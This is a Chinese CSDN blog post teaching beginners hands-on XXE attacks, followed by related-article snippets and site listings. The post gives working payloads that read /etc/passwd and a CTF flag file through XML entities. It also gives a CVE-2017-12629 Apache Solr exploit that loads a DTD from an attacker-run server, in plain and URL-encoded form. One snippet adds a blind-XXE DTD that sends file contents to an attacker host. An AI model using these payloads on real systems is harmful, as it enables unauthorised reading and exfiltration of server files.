萌新XXE漏洞实战类型

最新推荐文章于 2023-09-24 12:26:05 发布
最新推荐文章于 2023-09-24 12:26:05 发布
阅读量103 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/small_whitehat/article/details/129258439
版权

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞越来越少。如果你进行信息收集,从一个网站发现它嵌入了libxml2.9.0以下的版本,又或者你在抓包的时候,发现某处提交的数据是一个xml实体,那么就可以测试一波xxe漏洞。

例如 phpinfo 搜索libxml

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

就可以直接构造payload 发包打过去。

还有一种是登录口。

 

抓包发现是实体里面有数据的传输

<?xml version="1.0" encoding="UTF-8"?><root> <username>root</username> <password>root</password> </root>

记住,这个时候就要构造payload了, 因为你要匹配关键字 username 和password 否则其他的payload是不行的。payload

 

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root[

<!ENTITY admin SYSTEM "file:///flag">

]>

<root> 

<username>&admin;</username> 

<password>123456</password> 

</root>

 

另一种就是解析外部实体了,

比如CVE-2017-12629-xxe

在一台VPS上 开启web服务 将1.dtd放入到WWW目录 ,并写入如下内容:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>"> 

payload

GET /solr/demo/select?&q=<?xml version="1.0" ?><!DOCTYPE root[<!ENTITY % ext SYSTEM "http://ip/1.dtd">%ext;%ent;]><r>&data;</r>&wt=xml&defType=xmlparser 

并对参数q的值进行URL编码

GET /solr/demo/select?&q=%3c%3fxml%20version%3d%221.0%22%20%3f%3e%3c!DOCTYPE%20root%5b%3c!ENTITY%20%25%20ext%20SYSTEM%20%22http%3a%2f%2fip%2f1.dtd%22%3e%25ext%3b%25ent%3b%5d%3e%3cr%3e%26data%3b%3c%2fr%3e&wt=xml&defType=xmlparser 

 

 如果觉得有哪些是不懂的,可以私信我。

small_whitehat
关注
XXE漏洞(2)漏洞实战
jelly
07-07 2195
本次测试XXE主要在靶机上安装了bWAPP程序,中间有一关为XXE漏洞很好做测试了解XXE漏洞。 靶机:192.168.56.101 攻击机kali:192.168.56.1 目录 了解XXE漏洞原理 漏洞成因 怎么判断网站是否存在XXE漏洞 基本利用 XML漏洞利用 任意文件读取 有回显的xxe利用 读取特殊符号文件 没有回显读取文档的方式 内网探测 DDOS攻击 XXE漏洞防御 了解XXE漏洞原理 漏洞成因 XXE漏洞全称XML External Entity ...
CVE-2017-12629 xxe漏洞复现
xinyue9966的博客
03-21 1151
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
PHP XXE漏洞
qq_61553520的博客
05-13 243
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。
XXE注入
a3320315的博客
10-28 560
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
那些年踏过的CTF坑--phpinfo~(二)
u011215939的博客
01-19 4808
曾经学过文件包含,但是没有运用过,今天刚刚好遇到CTF内容为文件包含,可以实践一下来,访问IP:http://106.75.86.18:8888 初步查看URL:http://106.75.86.18:8888/index.php?path=phpinfo.php,path这是文件包含的所特有的,既然给我phpinfo那么就先看看给我们的信息: ubuntu的系统,文件
php xxe注入,PHP XXE漏洞
weixin_33764463的博客
03-10 500
PHP xml 外部实体注入漏洞(XXE)1.环境PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用2.原理介绍XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息...
XXE 漏洞及案例实战
来日可期的博客
09-24 2838
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
xxe漏洞实战
weixin_30782331的博客
08-03 573
前言 在 2017 年版的 OWASP TOP 10, xxe 强势上位。 本文对网上常见的利用方式做一个汇总 正文 测试环境 win10 phpstudy 测试代码: <?php $data = file_get_contents('php://input'); echo $data; $dom = new DOMDocument(); $dom->loadXML($dat...
XXE 漏洞实战
qq_46540840的博客
07-25 572
XXE 漏洞实战 补充知识 namp使用 特点 ​ 主机探测:探测网络上的主机,如列出响应TCP,ICMP请求,开放特别端口的主机 ​ 端口扫描: 探测目标主机所开放的端口 ​ 版本探测:探测目标主机的网络服务,其服务名称及版本号 常用命令 nmap -sP 192.168.0.1/24 扫描目标地址所在的C段在线情况 nmap -O 识别目标地址的操作系统 nmap -sV 检测目标地址开放的端口对应的服务版本信息 nmap sn 检测主机,不进行端口扫描 扫描某一目标地址的端
未知攻焉知防——XXE漏洞攻防.pdf
09-18
XXE漏洞全称为XML External Entity Injection,即XML外部实体注入漏洞,是...总体而言,本文以XXE漏洞为核心,结合相关网络安全技术,深入阐述了XML外部实体注入漏洞的攻防策略,为读者提供了全面的知识点和实战指导。
XXE漏洞
qi_SJQ_的博客
01-21 583
概念 全称XML External Entity Injection, 即xml外部实体注入漏洞,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口 扫描、攻击内网网站等危害。 了解一些xml,我们知道xml是一种数据存储类型,用于传输,而html用于显示。 XML被设计为数据和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可 选)、文档元素,其焦点是数据传输工具。 自己当初的学习笔记 XML与HTML的主要差异: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设.
XXE漏洞详解
weixin_56714714的博客
07-25 7836
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8485
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Oracle骨脚本卷积神经网络识别-RTL_CNN.zip
最新发布
10-03
Oracle骨脚本卷积神经网络识别-RTL_CNN
修改了谷歌提供的示例量子卷积神经网络模型,并在KDD99数据集上对其进行训练
10-03
修改了谷歌提供的示例量子卷积神经网络模型,并在KDD99数据集上对其进行训练,以实现网络攻击分类检测_ QuantumCnn NetworkAttackDetection
Eclipse下载、安装、配置教程(图文详解,建议收藏!!!)
10-03
eclipse Eclipse下载、安装、配置教程(图文详解,建议收藏!!!)
基于Python实现的地下车位分布算法设计源码
10-03
该项目是一个基于Python实现的地下车位分布算法设计源码,包含594个文件,其中包括542个Python源代码文件、19个可执行文件、6个文本文件、5个XML文件以及少量配置文件和模板文件。该算法旨在优化地下车位的分配与管理。
华为杯数学建模中,C题的数据清洗程序。_Math-Model-HuaWeiCup-2020.rar
10-03
华为杯数学建模中,C题的数据清洗程序。_Math-Model-HuaWeiCup-2020
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值